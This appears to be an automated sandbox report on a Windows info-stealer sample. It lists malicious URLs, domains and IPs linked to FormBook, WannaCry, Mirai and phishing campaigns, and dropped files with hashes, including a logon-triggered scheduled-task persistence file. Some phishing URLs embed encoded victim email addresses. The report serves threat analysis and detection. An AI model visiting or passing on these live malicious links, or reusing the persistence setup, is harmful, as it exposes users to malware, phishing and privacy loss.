                                                      • ww155.domionenergy.com/track.php?domain=domionenergy.com&caf=1&toggle=answercheck&answer=yes&uid=MTY4NTY2NjE3OC4zNjI5OmFmNzc0NjE1YjFmYjNjMDgwNDBlNWQzNDAxMjQyZWM3MGIxYmU3NDk5YWZkNzI2NTBjNzA1MDBiY2Q1NTkxZTI6NjQ3OTM5ODI1ODk4Zg%3D%3D
                                                      http://www.wealthremark.za.com/sefkxvnp/8OCqXxv-D9PH1BolF7EUziwyPTj_mBWAycyUrihRk8L.kVobyOmiUVscovgTgZXYrejjIqI_qAjDAFlRUeMrsBeGet hashmaliciousUnknownBrowse
                                                      • ww12.obfuscatorjavascript.com/?getsrc=ok&ref=&url=http%3A%2F%2Fwww.wealthremark.za.com%2Fsefkxvnp%2F8OCqXxv-D9PH1BolF7EUziwyPTj_mBWAycyUrihRk8L.kVobyOmiUVscovgTgZXYrejjIqI_qAjDAFlRUeMrsBe
                                                      jfgZPfmYR6.exeGet hashmaliciousCryptoWallBrowse
                                                      • ww38.fortecegypt.com/blog/wp-content/themes/twentyfourteen/rrr.php?j=ri9q2r5oypw
                                                      7aiGWK5cMt.exeGet hashmaliciousCryptoWallBrowse
                                                      • ww38.fortecegypt.com/blog/wp-content/themes/twentyfourteen/rrr.php?k=868iqrj70crjfb2
                                                      http://go.staticvisit.netGet hashmaliciousUnknownBrowse
                                                      • ww3.staticvisit.net/favicon.ico
                                                      http://advoarmy.com/Get hashmaliciousUnknownBrowse
                                                      • ww9.advoarmy.com/favicon.ico
                                                      E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.detskecd.info/be28/?VhU4=MlcLpxn0mj9&cB6Xl=7pvSZ0PF5W29LDJJGptnLBtApo1dm255Nqf6f3wuPWcHSEMcFxWssaNenSOPs6Ii6EDK
                                                      http://tricarelonline.comGet hashmaliciousUnknownBrowse
                                                      • ww9.tricarelonline.com/track.php?domain=tricarelonline.com&caf=1&toggle=answercheck&answer=yes&uid=MTY3NTQ2MTYxNS4wMTMyOjg3MTRhMmVkMmU4MzA3YTA2OTk1N2JlZWE3MDFhYTljNDMwODA4ZjVhZDlkM2RkM2QwYmI5N2YxZmFkOGFlNWI6NjNkZDgzZWYwMzM4OA%3D%3D
                                                      http://wwwtinyurl.comGet hashmaliciousUnknownBrowse
                                                      • ww5.wwwtinyurl.com/
                                                      http://ffbtas.comGet hashmaliciousUnknownBrowse
                                                      • ww9.ffbtas.com/track.php?domain=ffbtas.com&caf=1&toggle=answercheck&answer=yes&uid=MTY3NDI0MzkyNS4zMTY6ZjA2YTQ0OGE1ZWJhMzE4ZTAxYmUzZmNjMGU5NDVjNWU5NzMxMDZiNWNiN2EyNWYyOGM3MDQwZDJkYTNmZjQ3ZTo2M2NhZWY1NTRkMjRj
                                                      xIwkOnjSIa.dllGet hashmaliciousWannacryBrowse
                                                      • ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                                                      IU28r0EZFA.dllGet hashmaliciousWannacryBrowse
                                                      • ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                                                      ViNIRfmQmE.dllGet hashmaliciousWannacryBrowse
                                                      • ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                                                      https://cs.ffbtas.com/Get hashmaliciousUnknownBrowse
                                                      • ww9.ffbtas.com/track.php?domain=ffbtas.com&caf=1&toggle=answercheck&answer=yes&uid=MTY2ODUyODQ2NS45MTA3OjRlYmFjNmMyMWMyNGU1MzMyYzMxMGRhMDUzM2QyN2Q4NWE0MGM5NDdhMTY0NTQ4YjVkZmM1ODAxNGJmNjc1MTY6NjM3M2I5NTFkZTU3Nw%3D%3D
                                                      YB7v7UFV3j.exeGet hashmaliciousWannacryBrowse
                                                      • ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      342284.parkingcrew.netDHL_SHIPMENT_DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                                      • 76.223.26.96
                                                      Facturas_Pagadas_al_Vencimiento.PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 76.223.26.96
                                                      presupuesto_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 76.223.26.96
                                                      td-ccm-neg-87-45.wixdns.netInvoice.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45
                                                      IIuIBWOcyq.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45
                                                      https://r.srvtrck.com/v1/redirect?yk_tag=337_47d_c3_3b6f&site_id=56e7d51be4b05d750682348a&api_key=abbc5236946676eae219a734c0a1c5e8&url=https%3A%2F%2Ftamltdsti.com%2Fzoom%2Fnew%2Ftamltdsti%2FY2luZHkucGxhZ21hbkBjb3JuaHVza2VyaW50ZXJuYXRpb25hbC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                      • 34.149.87.45
                                                      295L6XpXfV.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45
                                                      nhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                                                      • 34.149.87.45
                                                      OOLU271690625023.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45
                                                      2mB350w4pv.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.149.87.45
                                                      AJmyiQHSAl.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.149.87.45
                                                      RFQ TWM 459077.comGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.149.87.45
                                                      RFQ_TWM_459077.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.149.87.45
                                                      rmGXfcVuz7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.149.87.45
                                                      0IwziVq2Dr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.149.87.45
                                                      Shipping_Documents.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45
                                                      https://fleek.ipfs.io/ipfs/QmY9qjgpPGtb15fL1UbMBxTLnZa1F2pi9zukShwoksKyjQ?filename=dany.html#john.norris@executiveairbornesolutions.comGet hashmaliciousHTMLPhisherBrowse
                                                      • 34.149.87.45
                                                      ions_com.msgGet hashmaliciousHTMLPhisherBrowse
                                                      • 34.149.87.45
                                                      PO-230102.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45
                                                      Karewood Star Vessel Description.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45
                                                      NFEP-CONFIDENTIALITY AGREEMENT(NDA).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 34.149.87.45
                                                      http://ch1.cc/live-tv/Get hashmaliciousUnknownBrowse
                                                      • 34.149.87.45
                                                      MV CEDAR VC2202 DETAILS.exeGet hashmaliciousFormBookBrowse
                                                      • 34.149.87.45

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      AMAZON-02USATT00001.htmGet hashmaliciousUnknownBrowse
                                                      • 18.244.102.57
                                                      https://mail.onelink.me/107872968?pid=nativeplacement&c=Global_Acquisition_YMktg_315_Internal_EmailSignature&af_sub1=Acquisition&af_sub2=Global_YMktg&af_sub3=&af_sub4=100000604&af_sub5=EmailSignature__Static_Get hashmaliciousUnknownBrowse
                                                      • 13.224.103.28
                                                      Messages Locker_1.3.290122_apkcombo.com.apkGet hashmaliciousUnknownBrowse
                                                      • 52.30.37.9
                                                      Messages Locker_1.3.290122_apkcombo.com.apkGet hashmaliciousUnknownBrowse
                                                      • 52.30.37.9
                                                      https://dvidpfoy.page.link/qj4kGet hashmaliciousUnknownBrowse
                                                      • 3.75.62.37
                                                      http://cloudflare-ipfs.comGet hashmaliciousUnknownBrowse
                                                      • 13.224.103.54
                                                      https://mail.onelink.me/107872968?pid=nativeplacement&c=Global_Acquisition_YMktg_315_Internal_EmailSignature&af_sub1=Acquisition&af_sub2=Global_YMktg&af_sub3=&af_sub4=100000604&af_sub5=EmailSignature__Static_Get hashmaliciousUnknownBrowse
                                                      • 34.247.78.58
                                                      Aged Inv Payment ATK0299384757.htmGet hashmaliciousUnknownBrowse
                                                      • 13.224.98.49
                                                      https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=https%3A%2F%2Freseauev-immobilier.fr%2Fxx%2FGB40WTYF44554325608478%2FYW50b29uLnZhbi5kZW4uYmVyZ0BoZW5kcml4LWdlbmV0aWNzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                      • 13.224.103.93
                                                      https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=https%3A%2F%2Freseauev-immobilier.fr%2Fxx%2FGB40WTYF44554325608478%2FYW50b29uLnZhbi5kZW4uYmVyZ0BoZW5kcml4LWdlbmV0aWNzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                      • 13.224.98.49
                                                      https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=http%3A%2F%2Fpolicememorialbd.com%2Fxx%2FGB13VEAC52359171238481%2FaXJpbmEubWFyaXRhbkBhY2l3b3JsZHdpZGUuY29tGet hashmaliciousUnknownBrowse
                                                      • 13.224.103.25
                                                      https://mhe7jf2l.page.link/Go1DGet hashmaliciousUnknownBrowse
                                                      • 3.160.212.76
                                                      pSWP8vqTi4.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 108.157.115.211
                                                      o0c7FkGyUI.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 34.209.36.237
                                                      x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 13.238.84.27
                                                      mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 13.247.240.130
                                                      arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 13.243.84.175
                                                      mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 13.112.22.50
                                                      https://www.billoreilly.com/site/rd?satype=40&said=4&aaid=email&camid=-448442788726870215&url=http%3A%2F%2Fmicc-roft.l-oracle.com?q=michelle.crosbie@cleanenergyregulator.gov.auGet hashmaliciousUnknownBrowse
                                                      • 108.138.189.116
                                                      https://www.bing.com/ck/a?!&&p=0168e371e1d600fbJmltdHM9MTY4OTcyNDgwMCZpZ3VpZD0yMzgxM2JjNC01MmVkLTYzZmQtMjBkYy0yODk2NTNlZDYyZjQmaW5zaWQ9NTMxNw&ptn=3&hsh=3&fclid=23813bc4-52ed-63fd-20dc-289653ed62f4&u=a1aHR0cHM6Ly93d3cuaGFtZGFyZC5pbi9idXNpbmVzc2VzL2xlYWRlcnNoaXAtdGVhbS8#bWV0aG9kZGV2ZWxvcG1lbnRAY2VyLmdvdi5hdQ==Get hashmaliciousUnknownBrowse
                                                      • 3.160.212.69

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hkkRsa.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                      C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                      Download File
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):984
                                                      Entropy (8bit):5.2414849034866355
                                                      Encrypted:false
                                                      SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                                                      MD5:4816271302882BDFB06EE40F624169D1
                                                      SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                                                      SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                                                      SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                                                      Malicious:false
                                                      Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):21764
                                                      Entropy (8bit):5.599714992647357
                                                      Encrypted:false
                                                      SSDEEP:384:CtCRqq0qLVAbu8g07bCzcVSVxnkNyiJ9g9SJ3uyV1Rm0ZWAVrdI9RRaA+inY8:pCi8gCvUxkNi9cuCrF8
                                                      MD5:B27C94FA49836AAD095FDB5C8EC5A186
                                                      SHA1:A5213DF036F6D59D50932B381E5FB0D23407EAD7
                                                      SHA-256:FBF98077B36A333F2F904D3D8C74A4CA13B355CA803591A72D46A19B81A52EE1
                                                      SHA-512:B1BC1D867E36BA5717702FBD2C4AAC89214E3CF617B6C85D343C5080C5DD742ED10A355B41F703715AA1AB44B4D32B6E5C1F299117EF4444CB6E4F314414FAE5
                                                      Malicious:false
                                                      Preview:@...e.....................z.D.9.....+.B..............@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                      C:\Users\user\AppData\Local\Temp\DB1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):49152
                                                      Entropy (8bit):0.7876734657715041
                                                      Encrypted:false
                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                      Malicious:true
                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ujlk5r3.m10.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ce45q1p3.n4h.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cred5wjw.2f5.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlbv4nfs.uw0.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\tmp22F9.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1597
                                                      Entropy (8bit):5.122974410982801
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuTuv
                                                      MD5:F66A4254B33D01F2D6FE272618551EBA
                                                      SHA1:F03B785354A6775EECECA1C7C7128CB2102769ED
                                                      SHA-256:FB97963AC638766734F4BFBA17EDF657EDC8410D379F42F41AE74C63E10415F9
                                                      SHA-512:2EC6EFE13CB7F2E368698DED78E6281718743E4F95E34308821336A06480DCC30C7EB30667D68D7C9CB8657B60E45B627E13B1FC7BBF0C5B81D59C367A727324
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                      C:\Users\user\AppData\Local\Temp\tmpE41B.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1597
                                                      Entropy (8bit):5.122974410982801
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuTuv
                                                      MD5:F66A4254B33D01F2D6FE272618551EBA
                                                      SHA1:F03B785354A6775EECECA1C7C7128CB2102769ED
                                                      SHA-256:FB97963AC638766734F4BFBA17EDF657EDC8410D379F42F41AE74C63E10415F9
                                                      SHA-512:2EC6EFE13CB7F2E368698DED78E6281718743E4F95E34308821336A06480DCC30C7EB30667D68D7C9CB8657B60E45B627E13B1FC7BBF0C5B81D59C367A727324
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                      C:\Users\user\AppData\Roaming\479O54QF\479logim.jpeg

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                      Category:dropped
                                                      Size (bytes):85068
                                                      Entropy (8bit):7.897722259557356
                                                      Encrypted:false
                                                      SSDEEP:1536:CwFfc1h3BPcUQKIQiBMEcbX1dY+5yUpknIDHs5Nd:r1c1cJKIJBMzX80y89M9
                                                      MD5:6530D644CE203153C2F8021CDE6757AA
                                                      SHA1:9DEE4DE92BD88C0B85B9CC63D92B73770A04212E
                                                      SHA-256:6AA1AE20BA133ADFC37B6DA1206DE245F10B95E1A0F191B048FE4BAC37395351
                                                      SHA-512:855721F91AD1EC173E80421BB3651C2259E21C79FBED7CAAD89EEAADF9E4ED10F406D8C3948A4EF0AF786A20915B5BFDE7F502506B3FF1FE427324BD409041A6
                                                      Malicious:false
                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....

